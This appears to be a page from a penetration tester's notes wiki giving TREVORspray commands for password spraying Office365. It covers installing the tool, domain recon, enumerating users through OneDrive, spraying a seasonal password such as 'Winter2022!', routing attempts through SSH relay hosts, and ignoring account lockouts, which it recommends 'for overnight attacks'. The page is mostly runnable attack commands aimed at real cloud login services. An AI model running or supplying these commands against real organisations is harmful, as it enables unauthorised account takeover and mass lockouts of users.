Office365

A list of tools and resources that I use for password spraying Microsoft products.

Password Spraying Office365

TrevorSpray

# Installation
pip install git+https://github.com/blacklanternsecurity/trevorproxy
pip install git+https://github.com/blacklanternsecurity/trevorspray

# Perform recon against a domain
trevorspray --recon $domain

# Enumerate users via OneDrive
trevorspray --recon $domain -u $emails --threads 3

# Spray with a 10 second delay between requests
trevorspray -u $validemails -p 'Winter2022!' --delay 10

# Spray with two robins and the current system
trevorspray -u $validemails -p 'Winter2022!' --ssh root@$robin root@$robin

# Spray while ignoring account lockout (good for overnight attacks)
trevorspray -u $validemails -p $passwords --ignore-lockouts

Identifying Emails without OSINT

GitHub - blacklanternsecurity/TREVORspray: TREVORspray is a modular password sprayer with threading, clever proxying, loot modules, and more!GitHub

References

Password spraying and MFA bypasses in the modern security landscape | Sprocket SecuritySprocket Security

PreviousExchange NextOkta

Last updated 1 year ago